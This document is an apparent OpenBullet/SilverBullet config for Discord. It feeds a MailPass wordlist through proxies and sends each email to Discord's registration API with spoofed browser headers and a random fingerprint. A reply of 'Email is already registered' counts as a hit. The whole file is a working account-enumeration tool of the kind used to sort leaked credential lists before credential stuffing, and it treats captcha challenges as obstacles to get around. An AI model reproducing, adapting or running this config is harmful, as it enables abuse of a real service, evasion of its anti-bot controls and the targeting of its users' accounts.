[SETTINGS]
{
  "Name": "Discord",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-04-02T19:28:34.8631988+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "9LIMBO",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION Constant "{\"os\":\"Windows\",\"browser\":\"Chrome\",\"device\":\"\",\"system_locale\":\"en-US\",\"browser_user_agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\",\"browser_version\":\"89.0.4389.114\",\"os_version\":\"8.1\",\"referrer\":\"https://discord.com/\",\"referring_domain\":\"discord.com\",\"referrer_current\":\"https://discord.com/\",\"referring_domain_current\":\"discord.com\",\"release_channel\":\"stable\",\"client_build_number\":81277,\"client_event_source\":null}" -> VAR "token" 

FUNCTION Base64Encode "<token>" -> VAR "super_properties" 

FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d.?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i" -> VAR "fingerprint" 

FUNCTION RandomString "?i?i?i?i?i?i?i?i?i?i?i?i" -> VAR "username" 

FUNCTION RandomString "?i?i?i?i?i?i?i?i?i?i?i?i123@" -> VAR "password" 

REQUEST POST "https://discord.com/api/v8/auth/register" 
  CONTENT "{\"fingerprint\":\"<fingerprint>\",\"email\":\"<USER>\",\"username\":\"<username>\",\"password\":\"<password>\",\"invite\":null,\"consent\":true,\"date_of_birth\":\"2000-05-05\",\"gift_code_sku_id\":null,\"captcha_key\":null}" 
  CONTENTTYPE "application/json" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US" 
  HEADER "content-length: 256" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://discord.com" 
  HEADER "referer: https://discord.com/register" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 
  HEADER "x-fingerprint: <fingerprint>" 
  HEADER "x-super-properties: <super_properties>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Email is already registered" 
  KEYCHAIN Failure OR 
    KEY "captcha-required" 
    KEY "captcha_service" 

FUNCTION Constant "themutualguy" -> CAP "By" 

